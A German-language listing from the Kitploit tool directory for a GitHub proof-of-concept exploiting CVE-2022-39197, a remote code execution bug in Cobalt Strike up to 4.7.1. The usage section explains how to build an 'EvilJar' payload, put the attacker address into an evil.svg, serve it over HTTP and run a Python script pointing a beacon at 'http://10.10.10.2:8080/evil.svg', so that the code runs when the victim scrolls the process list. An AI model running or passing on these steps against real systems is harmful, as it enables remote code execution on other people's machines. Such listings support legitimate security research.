Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-39197 — CobaltStrike <= 4.7.1 RCE | Kitploit
Tools/GitHubGitHub/its-arun/cve-2022-39197
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCommand and ControlRed TeamingPayload-Entwicklung
GitHubits-arun/cve-2022-39197

CVE-2022-39197

CobaltStrike <= 4.7.1 RCE

Repository anzeigen
38775vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-39197 RCE POC

Verwendung

  • Payload vorbereiten
  1. Bearbeiten Sie Zeile 19 mit Ihrem Payload in EvilJar/src/main/java/Exploit.java
  2. Erstellen Sie mit jar: mvn clean compile assembly:single
  3. Verschieben Sie EvilJar-1.0-jar-with-dependencies.jar aus EvilJar/target/ in den Ordner serve/
  4. Bearbeiten Sie serve\evil.svg und ersetzen Sie [attacker]
  5. Bereitstellen mit python3 -m http.server 8080
  • Exploit ausführen
root@kitploit:~
python3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg

Der Payload wird ausgelöst, sobald der Benutzer durch die Prozessliste scrollt.

POC.JPG?

1.jpg

Referenzlinks

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — Es gibt eine großartige detaillierte Analyse dieser Sicherheitslücke https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html

Tool herunterladen